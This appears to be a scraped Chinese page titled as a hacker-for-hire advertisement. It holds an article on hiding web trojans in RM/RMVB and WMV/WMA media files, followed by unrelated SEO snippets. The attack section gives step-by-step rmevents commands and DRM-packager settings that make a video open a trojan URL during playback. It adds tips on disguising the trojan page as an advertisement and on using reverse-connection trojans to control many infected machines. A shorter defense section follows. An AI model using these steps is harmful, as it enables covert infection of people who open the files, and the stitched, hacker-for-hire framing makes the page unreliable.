先办事后付款的黑客qq黑客接单 无定金

访客4年前黑客工具578

如今 *** 上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,使 *** 上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此,如果在媒体文件中植入木马,那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害,危害性可见一斑。   攻:媒体文件种马于无形   RM、RMVB中加入木马   Helix Producer Plus是一款图形化的专业流媒体文件 *** 工具,我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式,当然也可以对已存在的RM文件进行重新编辑,在编辑的同时,我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件,插入在其中的网页木马也会随之打开,我们甚至还能控制网页木马打开的时间,让网页木马更隐蔽。   步骤1:首先下载Helix Producer Plus,一路“Next”完成安装,然后我们要找一个能把网页木马插入其中的RM电影文件,把它改名为film.rm,然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。   步骤2:我们在这个文件夹中新建一个文本文档,命名为test.txt,在test.txt文件中写入这样一句命令:“u 00:07:00 00:07:30 http://www.***.com/index.php”,这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件,然后到7分30秒的时候事件结束,最后面的就是URL的网址,我们可以把这个网址改成我们的网页木马的地址(关于网页木马的 *** 和设置已经多次介绍,在此不再重复),这样便可以在别人看媒体文件的时候打开网页木马,让他不知不觉中招(如图1)。   小提示:对于 *** 的网页木马应尽量隐蔽,并模仿正常网页,否则在看媒体文件时突然弹出网页谁都会有疑心,当然把它做成类似的广告网页效果更好,别人会以为是广告,便一关了之,而这时我们已经种马成功了。对于木马的选择应尽量使用具有反向连接的木马,如灰鸽子,否则即使有了上百的肉鸡,一个一个去连接也是很麻烦的。   步骤3:运行CMD(命令提示符),进入RealMediaEditor文件夹,输入命令:“rmevents -i film.rm -e test.txt -o film2.rm”,这是最关键的一步,意思是利用Helix Producer Plus自带的rmevents.exe把test.txt这个触发URL事件合并到film.rm中,并另存为film2.rm。这个新生成的film2.rm便是我们需要的带有网页木马的媒体文件(如图2)。 WMV、WMA中加入木马   对于WMA、WMV文件,我们可以利用其默认的播放器Windows Media Player的“Microsoft Windows媒体播放器数字权限管理加载任意网页漏洞”来插入木马。当我们播放已经插入木马的恶意文件时,播放器首先会弹出一个提示窗口,说明此文件经过DRM加密需要通过URL验证证书,而这个URL就是我们事先设置好的网页木马地址,当用户点击“是”进行验证时,我们便种马成功了。和RM文件种马一样,在WMV文件中插入木马我们还需要一样工具——WMDRM打包加密器,这是一款可以对WMA、WMV进行DRM加密的文件,软件本身是为了保护媒体文件的版权,但在攻击者手中,便成了黑客的帮凶。   安装“WMDRM打包加密器”,完成后运行,软件界面很简洁(如图3)。首先出现的是“自定义打包”标签,我们点击“源文件”右边的浏览按钮,选择一个WMA或WMV文件,然后我们在下面的“输出目录”里选择生成恶意文件的保存路径,然后在“输出文件后缀” 中填入生成的文件后缀,建议和源文件保持一致。完成后我们切换到“认证字符串”标签, 在“认证URL”栏里输入我们的网页木马地址,如:http://www.***.com/index.php,其他保持默认即可。再切换到“自定义打包”标签,点击“打包加密’按钮,植有网页木马的恶意媒体文件就生成了。   当用户打开这个恶意媒体文件时,Windows Media Player会要求你获取证书(如图4),点击“确定”后就会弹出我们的网页木马。   有攻就有防,我们不能坐以待毙,任其宰割,其实恶意媒体文件不是我们想象中的那么神秘,只要我们掌握好一些清除网页木马的小知识,就可以完全阻止网页木马运行。 防:恶意媒体,原形毕露   RM、RMVB木马清除 ***   我们以上文中 *** RM木马的 *** 为例,新建一个内容为空的文本文件test.txt,然后在CMD中运行“rmevents -i 存在木马的媒体文件.rm -e test.txt -o film.rm”,这样便可以利用与插入木马相同的办法把触发URL事件覆盖掉,这时输出的film.rm便是不存在木马的干净媒体文件了。   如果对命令提示符的使用不熟悉,我们使用Helix RealMedia Editor来清除其中的网页木马。打开RealMediaEditor文件夹下的rmevents.exe文件,其界面如图5所示,同样新建一个内容为空的test.txt,然后在Helix RealMedia Editor的菜单栏中点击“Tools”,选择其中的“Merge Events”。接着选择我们刚才创建的test.txt,点击“确定”。最后选择“File”菜单中的“Save RealMedia File”保存媒体文件即可,其原理和利用rmevents.exe清除网页木马的原理是一样的。   WMA、WMV木马清除 ***   由于这是利用了Windows Media Player的漏洞,因此我们不能清除媒体文件中的恶意DRM加密信息,我们唯一可以做的就是打好补丁,恶意WMA、WMV文件对打过补丁的Windows Media Player将不起作用。补丁下载地址:http://www.microsoft.com/technet/security/此外,我们还可以选择其他的播放器来播放媒体文件,如暴风影音、Mplayer等,一些在媒体文件中插入网页木马事件的功能在它们面前将不起作用,因此这样也可以在一定程度上防范媒体网页木马。   安全在很大程度上取决于用户的安全意识,只有提高安全意识才能减少中招的概率,比如不打开陌生的媒体文件,不随意进入陌生的网站等,当然光有安全意识还不够,我们还需要杀毒软件等好帮手,毕竟任何网页木马都需要先下载到本地才能运行,而杀毒软件可以防止木马的运行,因此我们必须及时升级杀毒软件的病毒库。只有防先于攻,才能算得上是真正的安全。

相关文章

万圣夜是什么节日-万圣夜是什么意思呀-万圣夜是什么日子

相信很多人都有听说过万圣节吧!这其实是西方的一个传统节日,跟我国的中米节差不多,它们都有另一个称号——鬼节,不过两国之间的庆祝方式有所不同。除此以外,大家可能还听到了万圣夜这个称呼,很多盆友都不知道万...

实例分享:To B 内容营销如何高效获客?

实例分享:To B 内容营销如何高效获客?

To B业务中,内容营销意味着相对高效的触达与转化率,可觉得产物与团队带来精准且优质的客源。那么To B 业务内容营销怎么做才气高效获客呢?有哪些留意点?本文作者团结案例,分享了高效获客的履历与思考,...

黑道学生第二部的黑客(黑道学生第二部小说)

黑道学生第二部的黑客(黑道学生第二部小说)

本文导读目录: 1、黑道学生有几部 2、黑道学生一共几部 3、谁知道黑道学生1,2,3里面的所有人得名字主角 4、黑道学生2说的都是谁 5、黑道学生有几部呢? 黑道学生有几部 黑道学...

白洋淀孔雀城(白洋淀孔雀城别墅争议)

  潮白河的8000多,大兴的7五妙水仙膏000多,照旧内部价,潮白河的快向戈壁进军到香河了,离国。  . 孔雀小刺猬耳放城有别墅,联排排屋,叠加小高层三哮喘病医院种范例,别墅有升值潜力。 别墅(新西...

云顶之弈10.12版6圣盾2秘术阵容怎么搭配 6圣盾2秘术阵容搭配推荐

云顶之弈10.12版6圣盾2秘术阵容怎么搭配 6圣盾2秘术阵容搭配推荐

云顶之弈最新10.12版本中的6圣盾2秘术阵容要怎么进行搭配比较厉害呢?好多小伙伴们都在问呢,来一起看看6圣盾2秘术阵容搭配推荐分享吧! 10.12版6圣盾2秘术阵容怎么搭配 吃鸡率第1 前四...

解酒药有哪些(有解酒作用的药物有哪些)

日常日常生活很多人很有可能都是会有喝酒的习惯性,特别是在在过年或过节的情况下交际饮酒也是防止不上的,可是喝过多的酒对人体的身心健康有十分坏的危害,那麼有什么物品能够做为解酒药快速醒酒呢。 饮入的乙醇经...